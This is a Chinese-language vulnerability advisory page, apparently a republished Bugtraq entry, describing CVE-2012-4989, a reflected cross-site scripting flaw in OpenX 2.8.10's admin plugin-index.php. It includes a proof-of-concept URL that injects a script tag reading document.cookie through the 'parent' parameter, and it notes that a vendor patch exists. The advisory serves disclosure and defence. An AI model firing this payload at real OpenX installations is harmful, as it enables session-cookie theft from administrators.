发布日期:2012-10-10
更新日期:2012-10-26受影响系统:
OpenX OpenX 2.8.10
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 55860
CVE ID: CVE-2012-4989OpenX是用PHP编写的开源广告服务器。OpenX 2.8.10及其他版本在admin/plugin-index.php的实现上存在安全漏洞,利用这些漏洞可允许攻击者通过info操作内的parent参数注入任意Web脚本或HTML。<*来源:High-Tech Bridge
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!http://www.example.com/www/admin/plugin-index.php?action=info&amp;group=vastInlineBannerTypeHtml&amp;parent=%22%3E%3C script%3Ealert%28document.cookie%29;%3C/script%3E [XSS]建议:
--------------------------------------------------------------------------------
厂商补丁:OpenX
-----
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://www.openx.org/OpenX admin/campaign-zone-link.php SQL注入漏洞多个HP产品信息泄露漏洞(CVE-2012-3268)相关资讯 跨站脚本执行漏洞 OpenX安全漏洞
- OpenX "flowplayer-3.1.1.min.js" (08/09/2013 20:43:31)
- Google Web Toolkit 跨站脚本执行 (01/26/2013 08:08:23)
- Apache CouchDB 跨站脚本执行漏洞 (01/19/2013 09:24:15)
| - HP Network Node Manager i多个不 (02/05/2013 09:14:03)
- JBoss Enterprise Portal Platform (01/26/2013 08:05:16)
- Advantech WebAccess HMI/SCADA不 (01/11/2013 08:47:20)
|
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站
|
易网时代-编程资源站